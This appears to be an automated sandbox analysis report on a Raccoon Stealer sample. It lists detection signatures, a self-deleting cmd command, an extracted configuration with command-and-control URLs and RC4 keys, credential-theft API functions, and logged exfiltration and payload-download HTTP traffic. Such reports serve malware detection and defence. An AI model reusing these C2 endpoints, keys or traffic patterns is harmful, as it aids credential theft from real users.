Loading ...

Play interactive tourEdit tour

Windows Analysis Report Tk6dsSEyOC.exe

Overview

General Information

Sample Name:Tk6dsSEyOC.exe
Analysis ID:528742
MD5:3613e68843dd0c745f079a6ef51a6e6a
SHA1:87f91a8e3bf01475cf3fe5a690374f95a4fb66c2
SHA256:271453e30f708718f175654f2b3fb5f4438effb11a928656d58f0051b424c740
Tags:exeRaccoonStealer
Infos:

Most interesting Screenshot:

Detection

Raccoon
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Detected unpacking (overwrites its own PE header)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Tries to steal Mail credentials (via file / registry access)
Machine Learning detection for sample
Self deletion via cmd delete
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sigma detected: Suspicious Del in CommandLine
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Is looking for software installed on the system
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
PE file contains more sections than normal
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • Tk6dsSEyOC.exe (PID: 7164 cmdline: "C:\Users\user\Desktop\Tk6dsSEyOC.exe" MD5: 3613E68843DD0C745F079A6EF51A6E6A)
    • cmd.exe (PID: 4572 cmdline: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\Tk6dsSEyOC.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 6656 cmdline: timeout /T 10 /NOBREAK MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • cleanup

Malware Configuration

Threatname: Raccoon Stealer

{"RC4_key2": "3be06ec4609b38e474bb469adec52280", "C2 url": ["http://91.219.236.162/masterdanteloma", "http://185.163.47.176/masterdanteloma", "http://193.38.54.238/masterdanteloma", "http://74.119.192.122/masterdanteloma", "http://91.219.236.240/masterdanteloma", "https://t.me/masterdanteloma"], "Bot ID": "14b265e74e2847e8408db7ca21fe6fe2e9ab5767", "RC4_key1": "hGjLqSdWvLpVmBeD"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmpJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
    00000000.00000002.480197054.00000000022B0000.00000040.00000001.sdmpJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
      00000000.00000003.251005006.0000000002340000.00000004.00000001.sdmpJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
        Process Memory Space: Tk6dsSEyOC.exe PID: 7164JoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
          Process Memory Space: Tk6dsSEyOC.exe PID: 7164JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.3.Tk6dsSEyOC.exe.2340000.0.raw.unpackJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
              0.2.Tk6dsSEyOC.exe.22b0e50.1.raw.unpackJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
                0.3.Tk6dsSEyOC.exe.2340000.0.unpackJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
                  0.2.Tk6dsSEyOC.exe.400000.0.raw.unpackJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
                    0.2.Tk6dsSEyOC.exe.400000.0.unpackJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
                      Click to see the 1 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicious Del in CommandLineShow sources
                      Source: Process startedAuthor: frack113: Data: Command: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\Tk6dsSEyOC.exe", CommandLine: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\Tk6dsSEyOC.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Tk6dsSEyOC.exe" , ParentImage: C:\Users\user\Desktop\Tk6dsSEyOC.exe, ParentProcessId: 7164, ProcessCommandLine: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\Tk6dsSEyOC.exe", ProcessId: 4572

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: Tk6dsSEyOC.exeVirustotal: Detection: 49%Perma Link
                      Source: Tk6dsSEyOC.exeReversingLabs: Detection: 54%
                      Yara detected Raccoon StealerShow sources
                      Source: Yara matchFile source: 0.3.Tk6dsSEyOC.exe.2340000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Tk6dsSEyOC.exe.22b0e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.Tk6dsSEyOC.exe.2340000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Tk6dsSEyOC.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Tk6dsSEyOC.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Tk6dsSEyOC.exe.22b0e50.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.480197054.00000000022B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.251005006.0000000002340000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Tk6dsSEyOC.exe PID: 7164, type: MEMORYSTR
                      Antivirus detection for URL or domainShow sources
                      Source: http://188.127.251.217/sys64.exeAvira URL Cloud: Label: malware
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: http://188.127.251.217/sys64.exeVirustotal: Detection: 12%Perma Link
                      Machine Learning detection for sampleShow sources
                      Source: Tk6dsSEyOC.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0040E727 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,0_2_0040E727
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0040D560 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,0_2_0040D560
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0042770E CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree,0_2_0042770E
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0040F78B __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree,0_2_0040F78B
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_004278E1 lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree,0_2_004278E1
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0040DC7B __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,0_2_0040DC7B
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0041E52C __EH_prolog,_strlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,PK11_FreeSlot,0_2_0041E52C

                      Compliance:

                      barindex
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeUnpacked PE file: 0.2.Tk6dsSEyOC.exe.400000.0.unpack
                      Source: Tk6dsSEyOC.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49766 version: TLS 1.2
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: Tk6dsSEyOC.exe, 00000000.00000003.374795304.000000004BC6B000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.427942523.000000004BC71000.00000004.00000010.sdmp, freebl3.dll.0.dr
                      Source: Binary string: C:\bixorotuma_wufeyeyur\loyopuwudi-xovozoko\muba.pdb source: Tk6dsSEyOC.exe
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.0.dr
                      Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.dr
                      Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.0.dr
                      Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.0.dr
                      Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.427951428.000000004BC7E000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000002.481321705.000000004BC7E000.00000004.00000010.sdmp, api-ms-win-core-memory-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.378196371.000000004BC7F000.00000004.00000010.sdmp, ldap60.dll.0.dr
                      Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr
                      Source: Binary string: C:\bixorotuma_wufeyeyur\loyopuwudi-xovozoko\muba.pdb0= source: Tk6dsSEyOC.exe
                      Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.0.dr
                      Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
                      Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: Tk6dsSEyOC.exe, 00000000.00000002.483423544.000000006FD89000.00000002.00020000.sdmp, mozglue.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.374795304.000000004BC6B000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.427942523.000000004BC71000.00000004.00000010.sdmp, freebl3.dll.0.dr
                      Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.0.dr
                      Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy.dll.0.dr, MapiProxy_InUse.dll.0.dr
                      Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.0.dr
                      Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: Tk6dsSEyOC.exe, 00000000.00000003.378196371.000000004BC7F000.00000004.00000010.sdmp, ldap60.dll.0.dr
                      Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.0.dr
                      Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.0.dr
                      Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: Tk6dsSEyOC.exe, 00000000.00000002.483423544.000000006FD89000.00000002.00020000.sdmp, mozglue.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.0.dr
                      Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr
                      Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
                      Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
                      Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.0.dr, mozMapi32_InUse.dll.0.dr
                      Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.0.dr
                      Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
                      Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.372483857.000000004BC51000.00000004.00000010.sdmp, AccessibleMarshal.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.0.dr
                      Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.373618716.000000004BC7F000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.373284353.000000004BC7E000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.373416548.000000004BC7E000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.373403037.000000004BC7E000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.373313194.000000004BC7E000.00000004.00000010.sdmp, breakpadinjector.dll.0.dr
                      Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.0.dr
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0043DA90 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,0_2_0043DA90
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0045E752 FindFirstFileExW,0_2_0045E752
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_00434721 __EH_prolog,GetLogicalDriveStringsA,0_2_00434721
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\Jump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\Jump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\Jump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\Jump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\Jump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\Jump to behavior

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.5:49767 -> 91.219.236.69:80
                      Source: TrafficSnort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.5:49767 -> 91.219.236.69:80
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorURLs: http://91.219.236.162/masterdanteloma
                      Source: Malware configuration extractorURLs: http://185.163.47.176/masterdanteloma
                      Source: Malware configuration extractorURLs: http://193.38.54.238/masterdanteloma
                      Source: Malware configuration extractorURLs: http://74.119.192.122/masterdanteloma
                      Source: Malware configuration extractorURLs: http://91.219.236.240/masterdanteloma
                      Source: Malware configuration extractorURLs: https://t.me/masterdanteloma
                      Source: Joe Sandbox ViewASN Name: SERVERASTRA-ASHU SERVERASTRA-ASHU
                      Source: Joe Sandbox ViewASN Name: SERVERASTRA-ASHU SERVERASTRA-ASHU
                      Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                      Source: global trafficHTTP traffic detected: GET /masterdanteloma HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: t.me
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 91.219.236.69
                      Source: global trafficHTTP traffic detected: GET //l/f/i6j2Un0B3dP17SpzFNyq/762b827e1bbc7bd715bf97e0fb01fbddd5bf5ab2 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.69
                      Source: global trafficHTTP traffic detected: GET //l/f/i6j2Un0B3dP17SpzFNyq/c88f6d712fdcff784a2f2a2ae8ea36494792f04b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.69
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVContent-Length: 1400Host: 91.219.236.69
                      Source: Joe Sandbox ViewIP Address: 91.219.236.240 91.219.236.240
                      Source: Joe Sandbox ViewIP Address: 91.219.236.162 91.219.236.162
                      Source: Joe Sandbox ViewIP Address: 91.219.236.162 91.219.236.162
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 25 Nov 2021 17:24:09 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Sun, 14 Nov 2021 14:06:13 GMTETag: "619117d5-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
